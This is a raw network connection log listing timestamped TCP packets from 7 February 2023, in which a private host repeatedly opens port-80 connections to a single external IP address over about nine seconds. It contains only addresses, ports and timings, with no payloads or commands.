Feb 7, 2023 19:59:32.766763926 CET	80	50237	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.766952991 CET	50237	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.875940084 CET	50237	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.876859903 CET	50238	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.938642979 CET	80	50237	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.938805103 CET	80	50238	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:32.938860893 CET	50237	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.938949108 CET	50238	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:32.939538956 CET	50238	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.001252890 CET	80	50238	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.003437996 CET	80	50238	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.006922960 CET	50238	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.122921944 CET	50238	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.123836040 CET	50239	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.184389114 CET	80	50239	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.184585094 CET	50239	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.184689045 CET	80	50238	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.184818983 CET	50238	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.185655117 CET	50239	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.246601105 CET	80	50239	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.249748945 CET	80	50239	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.249957085 CET	50239	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.356796026 CET	50239	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.357546091 CET	50240	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.417519093 CET	80	50239	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.417764902 CET	50239	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.419069052 CET	80	50240	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.419236898 CET	50240	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.419821024 CET	50240	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.481286049 CET	80	50240	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.483493090 CET	80	50240	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.483640909 CET	50240	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.590862036 CET	50240	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.591479063 CET	50241	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.652542114 CET	80	50240	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.652770042 CET	80	50241	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.652908087 CET	50240	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.653043032 CET	50241	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.653836966 CET	50241	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.715293884 CET	80	50241	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.717493057 CET	80	50241	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.717608929 CET	50241	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.825396061 CET	50241	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.825927019 CET	50242	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.886277914 CET	80	50242	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.886508942 CET	50242	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.886719942 CET	80	50241	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.886857033 CET	50242	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.886887074 CET	50241	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:33.947999954 CET	80	50242	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.950040102 CET	80	50242	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:33.950282097 CET	50242	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.061187983 CET	50242	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.062025070 CET	50243	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.121761084 CET	80	50242	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.121977091 CET	50242	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.124692917 CET	80	50243	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.124953985 CET	50243	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.125339031 CET	50243	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.187927008 CET	80	50243	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.191498995 CET	80	50243	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.191673040 CET	50243	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.294194937 CET	50243	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.295052052 CET	50244	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.355628014 CET	80	50244	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.355796099 CET	50244	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.356772900 CET	80	50243	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.356884956 CET	50243	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.357275009 CET	50244	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.417901993 CET	80	50244	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.420140982 CET	80	50244	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.420252085 CET	50244	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.529405117 CET	50244	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.529973030 CET	50245	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.590187073 CET	80	50244	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.590338945 CET	50244	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.591317892 CET	80	50245	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.591423988 CET	50245	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.591840982 CET	50245	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.653199911 CET	80	50245	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.655571938 CET	80	50245	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.655699968 CET	50245	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.763961077 CET	50245	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.765074015 CET	50246	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.825464964 CET	80	50245	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.825546026 CET	50245	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.826500893 CET	80	50246	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.826594114 CET	50246	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.827639103 CET	50246	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:34.889139891 CET	80	50246	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.891089916 CET	80	50246	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:34.891151905 CET	50246	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.006624937 CET	50246	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.007280111 CET	50247	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.068092108 CET	80	50246	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.068190098 CET	50246	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.068578005 CET	80	50247	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.068710089 CET	50247	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.069046974 CET	50247	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.130465031 CET	80	50247	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.133958101 CET	80	50247	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.134066105 CET	50247	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.247386932 CET	50247	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.247946978 CET	50248	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.308566093 CET	80	50248	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.308794975 CET	50248	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.308923006 CET	80	50247	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.309005022 CET	50247	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.309770107 CET	50248	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.370408058 CET	80	50248	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.372901917 CET	80	50248	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.373034954 CET	50248	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.483604908 CET	50248	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.485282898 CET	50249	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.544925928 CET	80	50248	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.547008038 CET	50248	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.547483921 CET	80	50249	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.547600031 CET	50249	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.548839092 CET	50249	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.611682892 CET	80	50249	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.614097118 CET	80	50249	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.614212990 CET	50249	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.717175961 CET	50249	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.718919992 CET	50250	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.778840065 CET	80	50249	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.780762911 CET	50249	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.781611919 CET	80	50250	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.781743050 CET	50250	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.782201052 CET	50250	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.844805002 CET	80	50250	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.846967936 CET	80	50250	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:35.850879908 CET	50250	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.967724085 CET	50250	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:35.969696045 CET	50251	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.030718088 CET	80	50250	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.031908035 CET	50250	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.032371998 CET	80	50251	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.032565117 CET	50251	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.032975912 CET	50251	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.095319033 CET	80	50251	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.099670887 CET	80	50251	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.099864006 CET	50251	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.216161013 CET	50251	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.216835976 CET	50252	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.277431965 CET	80	50252	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.277662992 CET	50252	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.278552055 CET	80	50251	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.278597116 CET	50252	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.278669119 CET	50251	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.340190887 CET	80	50252	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.342716932 CET	80	50252	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.342878103 CET	50252	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.454430103 CET	50252	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.455547094 CET	50253	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.515069008 CET	80	50252	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.515223026 CET	50252	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.516882896 CET	80	50253	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.517021894 CET	50253	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.518712044 CET	50253	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.580149889 CET	80	50253	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.582421064 CET	80	50253	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.582581043 CET	50253	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.689194918 CET	50253	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.690097094 CET	50254	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.750617981 CET	80	50253	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.750814915 CET	50253	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.752438068 CET	80	50254	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.752583981 CET	50254	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.757802963 CET	50254	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.819334984 CET	80	50254	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.821479082 CET	80	50254	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.821583986 CET	50254	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.935461998 CET	50254	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.938678980 CET	50255	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:36.998886108 CET	80	50254	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:36.999028921 CET	50254	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.002803087 CET	80	50255	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.002959967 CET	50255	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.003437996 CET	50255	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.066273928 CET	80	50255	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.070807934 CET	80	50255	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.070962906 CET	50255	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.185852051 CET	50255	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.186753988 CET	50256	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.250920057 CET	80	50255	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.250977039 CET	80	50256	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.251023054 CET	50255	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.251096964 CET	50256	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.251533985 CET	50256	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.314410925 CET	80	50256	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.316498995 CET	80	50256	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.316627026 CET	50256	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.427839041 CET	50256	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.428638935 CET	50257	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.489824057 CET	80	50256	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.489897966 CET	50256	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.491292000 CET	80	50257	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.491405964 CET	50257	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.493308067 CET	50257	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.556900024 CET	80	50257	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.557957888 CET	80	50257	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.558053017 CET	50257	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.673789024 CET	50257	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.674603939 CET	50258	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.738363981 CET	80	50258	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.738392115 CET	80	50257	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.738471031 CET	50258	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.738506079 CET	50257	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.739912987 CET	50258	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.803297043 CET	80	50258	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.803917885 CET	80	50258	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.804028988 CET	50258	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.920269966 CET	50258	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.921148062 CET	50259	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.981540918 CET	80	50259	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.981564999 CET	80	50258	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:37.981654882 CET	50258	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.981668949 CET	50259	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:37.982208967 CET	50259	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.042393923 CET	80	50259	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.046180010 CET	80	50259	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.046287060 CET	50259	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.154503107 CET	50259	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.155505896 CET	50260	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.214982986 CET	80	50259	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.215156078 CET	50259	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.217956066 CET	80	50260	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.218113899 CET	50260	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.219727039 CET	50260	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.282134056 CET	80	50260	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.284630060 CET	80	50260	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.284768105 CET	50260	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.406202078 CET	50260	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.407133102 CET	50261	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.468512058 CET	80	50260	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.468596935 CET	80	50261	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.468780041 CET	50260	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.468828917 CET	50261	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.469324112 CET	50261	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.530864954 CET	80	50261	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.533472061 CET	80	50261	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.535475969 CET	50261	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.638135910 CET	50261	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.638917923 CET	50262	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.699250937 CET	80	50262	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.699681997 CET	80	50261	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.699835062 CET	50262	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.699847937 CET	50261	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.726303101 CET	50262	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.786861897 CET	80	50262	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.789239883 CET	80	50262	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.793076992 CET	50262	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.905174017 CET	50262	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.906234026 CET	50263	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.965666056 CET	80	50262	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.965739965 CET	50262	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.966572046 CET	80	50263	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:38.966661930 CET	50263	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:38.967067957 CET	50263	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.027396917 CET	80	50263	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.029592991 CET	80	50263	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.031995058 CET	50263	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.139048100 CET	50263	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.140038967 CET	50264	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.203036070 CET	80	50263	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.204308033 CET	50263	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.204698086 CET	80	50264	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.204933882 CET	50264	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.205303907 CET	50264	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.267476082 CET	80	50264	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.271297932 CET	80	50264	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.275187969 CET	50264	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.388566017 CET	50264	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.389388084 CET	50265	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.450875044 CET	80	50265	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.451191902 CET	80	50264	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.451500893 CET	50264	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.451523066 CET	50265	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.451987982 CET	50265	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.513139963 CET	80	50265	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.515446901 CET	80	50265	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.515527010 CET	50265	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.623341084 CET	50265	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.624495029 CET	50266	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.685153961 CET	80	50265	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.685376883 CET	50265	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.687097073 CET	80	50266	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.687305927 CET	50266	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.687644005 CET	50266	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.750044107 CET	80	50266	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.752242088 CET	80	50266	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.752391100 CET	50266	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.858629942 CET	50266	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.859532118 CET	50267	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.919934988 CET	80	50267	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.920114994 CET	50267	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.920444012 CET	50267	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.921221018 CET	80	50266	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.921305895 CET	50266	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:39.980614901 CET	80	50267	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.982950926 CET	80	50267	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:39.983124018 CET	50267	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.096961975 CET	50267	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.097887993 CET	50268	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.157371998 CET	80	50267	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.157556057 CET	50267	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.159591913 CET	80	50268	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.159905910 CET	50268	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.160557032 CET	50268	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.222201109 CET	80	50268	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.225560904 CET	80	50268	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.225639105 CET	50268	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.351496935 CET	50268	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.352178097 CET	50269	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.413077116 CET	80	50269	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.413199902 CET	50269	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.413381100 CET	80	50268	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.413455009 CET	50268	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.413542986 CET	50269	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.474066019 CET	80	50269	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.476356983 CET	80	50269	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.476461887 CET	50269	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.592369080 CET	50269	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.593194962 CET	50270	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.653773069 CET	80	50269	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.653898001 CET	50269	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.654105902 CET	80	50270	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.654211998 CET	50270	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.657860994 CET	50270	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.718477011 CET	80	50270	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.720915079 CET	80	50270	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.720977068 CET	50270	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.826797009 CET	50270	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.887463093 CET	80	50270	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.887614012 CET	50270	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.894435883 CET	50271	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:40.954956055 CET	80	50271	62.204.41.4	192.168.2.5
Feb 7, 2023 19:59:40.955209970 CET	50271	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.182547092 CET	50271	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:59:41.243417025 CET	80	50271	62.204.41.4	192.168.2.5
